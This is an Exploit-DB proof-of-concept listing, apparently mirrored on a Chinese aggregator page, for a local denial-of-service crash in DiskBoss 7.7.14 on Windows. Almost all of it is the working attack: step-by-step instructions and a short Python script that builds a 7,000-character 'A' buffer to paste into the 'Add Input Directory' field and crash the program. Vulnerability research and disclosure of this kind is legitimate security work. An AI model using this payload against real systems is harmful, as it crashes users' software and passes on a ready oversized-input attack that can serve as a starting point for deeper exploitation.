DiskBoss 7.7.14 – Denial of Service (PoC)

• Exploit Database
• 11 阅读

• 作者： Paras Bhatia
  日期： 2020-04-01
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48276/

• # Exploit Title: DiskBoss 7.7.14 - Denial of Service (PoC) 
  # Date: 2020-04-01
  # Exploit Author: Paras Bhatia
  # Vendor Homepage: https://www.diskboss.com/ 
  # Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
  # Vulnerable Software: DiskBoss
  # Version: 7.7.14
  # Vulnerability Type: Denial of Service (DoS) Local
  # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
  
  #Steps to Produce the Crash:
  
  # 1.- Run python code: DiskbossCrash.py
  # 2.- Copy content to clipboard
  # 3.- Open "diskboss.exe" (diskbsg.exe)
  # 4.- Go to "Command" > Search Files
  # 5.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
  # 6.- Click on " Add Input Directory"
  # 7.- Paste ClipBoard into the "Directory" field
  # 8.- Click on OK
  # 9.- Crashed
  
  #Python "DiskbossCrash.py" Code:
   
  buffer = "\x41" * 7000
  f = open ("DiskbossCrash.txt", "w")
  f.write(buffer)
  f.close()